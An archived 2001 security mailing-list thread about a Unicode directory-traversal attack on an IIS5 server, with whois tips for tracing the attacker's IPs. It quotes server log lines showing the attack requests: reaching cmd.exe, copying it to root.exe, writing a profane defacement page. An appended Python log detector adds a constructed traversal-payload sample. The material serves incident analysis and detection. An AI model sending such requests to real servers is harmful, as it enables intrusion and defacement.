If you're trying to send to the .pl script directly, you'll need to use this: http://www.arin.net/cgi-bin/whois.pl?queryinput=. After the =, place an IP (best when sent from a form).

-----Original Message-----
From: Matt Rowley [mailto:matt.rowleyat_private]
Sent: Monday, May 14, 2001 1:26 PM
To: Thomas Springer; INCIDENTSat_private
Subject: RE: who's owning this ip?

http://www.arin.net/cgi-bin/whois.pl to reverse lookup the ip for the coordinator.

--Matt

> -----Original Message-----
> From: Incidents Mailing List [mailto:INCIDENTSat_private] On
> Behalf Of Thomas Springer
> Sent: Tuesday, May 08, 2001 12:08 PM
> To: INCIDENTSat_private
> Subject: who's owning this ip?
>
>
> We had an attacker exploiting unicode on iis5 yesterday - see funny
> chinese-war-pages in the log below. The hacker successfully exploited
> IIS-Unicode bug, created ~100 files but was still too dumb to deface the
> webserver.
>
> The attacker used 208.22.161.15 and 202.97.205.3.
> I tried a trace but ended up with
> ...
> 19 210 ms 211 ms 220 ms pao1-sjc2-oc48-2.pao1.above.net [
> 20 210 ms 231 ms 230 ms 208.184.129.244.cmnetcom.com.hk [
> 21 200 ms 211 ms 220 ms 202.0.170.34
> 22 361 ms 370 ms 411 ms 202.0.170.13
> 23 370 ms 391 ms 400 ms 202.97.10.193
> 24 521 ms 541 ms 551 ms 202.97.10.66
> 25 581 ms 601 ms 581 ms 61.138.38.2
> 26 721 ms 711 ms 671 ms 61.180.139.202
> 27 341 ms 350 ms 351 ms 202.97.205.3
>
> 208.22.161.15 seems to end at
> 17 130 ms 130 ms 131 ms ewr-core-02.inet.qwest.net [205.171.17.130]
> 18 110 ms 110 ms 111 ms ewr-brdr-01.inet.qwest.net [205.171.17.82]
> 19 * * * Timeout..
> ....
>
> Any chances to find out, to whom the two ip-addresses belong?
> Any tool that copies cmd.exe to root.exe?
>
> I liked this hack, because nothing happened and people here
> suddenly develop
> security-awareness. Hence, even the servers i begged to secure for weeks
> are patched now.
> BTW it's a german website - nothing to do with an
> chinese-american spy-wars.
>
> funny hackerworld...
>
> thomas
>
> --- IIS-Logsnip ---
> 2001-05-07 12:28:54 208.22.161.15 - 10.253.6.15 80 GET
> /scripts/../../winnt/system32/cmd.exe /c+dir 200 664 66 - - -
> 2001-05-07 12:28:54 208.22.161.15 - 10.253.6.15 80 GET
> /scripts/../../winnt/system32/cmd.exe /c+dir+..\ 200 856 70 - - -
> 2001-05-07 12:28:54 208.22.161.15 - 10.253.6.15 80 GET
> /scripts/../../winnt/system32/cmd.exe
> /c+copy+\winnt\system32\cmd.exe+root.exe 502 382 100 - - -
> 2001-05-07 12:28:54 208.22.161.15 - 10.253.6.15 80 GET /scripts/root.exe
> /c+echo+^<html^>^<body+bgcolor%3Dblack^>^<br^>^<br^>^<br^>^<br^>
> ^<br^>^<br^>
> ^<table+width%3D100%^>^<td^>^<p+align%3D%22center%22^>^<font+siz
> e%3D7+color%
> 3Dred^>fuck+USA+Government^</font^>^<tr^>^<td^>^<p+align%3D%22ce
> nter%22^>^<f
> ont+size%3D7+color%3Dred^>fuck+PoizonBOx^<tr^>^<td^>^<p+align%3D
> %22center%22
> ^>^<font+size%3D4+color%3Dred^>contact:sysadmcnat_private^</h
> tml^>>.././i
> ndex.asp 502 355 423 - - -
> 2001-05-07 12:28:55 208.22.161.15 - 10.253.6.15 80 GET /scripts/root.exe
> /c+echo+^<html^>^<body+bgcolor%3Dblack^>^<br^>^<br^>^<br^>^<br^>
> ^<br^>^<br^>
> ^<table+width%3D100%^>^<td^>^<p+align%3D%22center%22^>^<font+siz
> e%3D7+color%
> 3Dred^>fuck+USA+Government^</font^>^<tr^>^<td^>^<p+align%3D%22ce
> nter%22^>^<f
> ont+size%3D7+color%3Dred^>fuck+PoizonBOx^<tr^>^<td^>^<p+align%3D
> %22center%22
> ^>^<font+size%3D4+color%3Dred^>contact:sysadmcnat_private^</h
> tml^>>.././i
> ndex.htm 502 355 423 - - -
>
>
> Thomas Springer
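The log snippet above shows the whole sequence the thread discusses: traversal out of /scripts to cmd.exe, a copy of cmd.exe staged as root.exe, then root.exe used to write the defacement. As an added example (not from any poster in this thread), here is a small detector that walks IIS W3C log lines in that format and tags each step. The sample log is constructed from the quoted lines; the two 10.1.2.x lines are invented to show a raw overlong-encoded request (the IIS Unicode trick the post refers to) and a benign request. The field positions assume the column order visible in the quoted log.

```python
from urllib.parse import unquote_to_bytes

# Constructed sample, modelled on the IIS W3C log excerpt quoted in the thread (fields:
# date time c-ip cs-username s-ip s-port cs-method cs-uri-stem cs-uri-query sc-status ...).
# The two 10.1.2.x lines are invented: one raw overlong-encoded request, one benign request.
SAMPLE_LOG = r"""
2001-05-07 12:28:54 208.22.161.15 - 10.253.6.15 80 GET /scripts/../../winnt/system32/cmd.exe /c+dir 200 664 66 - - -
2001-05-07 12:28:54 208.22.161.15 - 10.253.6.15 80 GET /scripts/../../winnt/system32/cmd.exe /c+copy+\winnt\system32\cmd.exe+root.exe 502 382 100 - - -
2001-05-07 12:28:54 208.22.161.15 - 10.253.6.15 80 GET /scripts/root.exe /c+echo+^<html^>defaced^</html^>>.././index.asp 502 355 423 - - -
2001-05-07 12:29:01 10.1.2.3 - 10.253.6.15 80 GET /scripts/..%c0%af..%c0%afwinnt/system32/cmd.exe /c+dir 200 664 66 - - -
2001-05-07 12:30:00 10.1.2.4 - 10.253.6.15 80 GET /index.asp - 200 1234 300 - - -
"""

def decode_path(raw):
    """Percent-decode a URI and fold overlong 2-byte UTF-8 (lead 0xC0/0xC1) back to the
    ASCII byte it smuggles (e.g. %c0%af -> '/'), so the traversal check sees the real path."""
    data = unquote_to_bytes(raw)
    out = bytearray()
    i = 0
    while i < len(data):
        b = data[i]
        if b in (0xC0, 0xC1) and i + 1 < len(data) and 0x80 <= data[i + 1] <= 0xBF:
            out.append(((b & 0x1F) << 6) | (data[i + 1] & 0x3F))
            i += 2
        else:
            out.append(b)
            i += 1
    # IIS accepts backslash as a separator too, so normalise it before matching.
    return out.decode("latin-1").replace("\\", "/").lower()

def classify(line):
    # Returns {c_ip, stem, tags} for a suspicious request line, else None.
    fields = line.split()
    if len(fields) < 9:
        return None
    c_ip, stem, query = fields[2], decode_path(fields[7]), decode_path(fields[8])
    tags = []
    if "/../" in stem:                       # path escaped the /scripts virtual root
        tags.append("traversal")
    if stem.endswith("/cmd.exe"):            # command shell reached through the web server
        tags.append("cmd_exe")
    if "copy" in query and query.endswith("root.exe"):  # staging a copy of the shell
        tags.append("shell_copy")
    if stem.endswith("/scripts/root.exe"):   # the staged copy being used
        tags.append("root_exe")
    return {"c_ip": c_ip, "stem": stem, "tags": tags} if tags else None

def scan_log(text):
    # Run classify over every line; returns the hits in log order.
    return [hit for hit in (classify(l) for l in text.splitlines()) if hit]
```

Any hit tagged shell_copy or root_exe means the server was not merely probed but had a command shell staged under a web-reachable directory, which is the point at which the host should be rebuilt rather than just patched.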
This archive was generated by hypermail 2b30 : Mon May 14 2001 - 16:52:05 PDT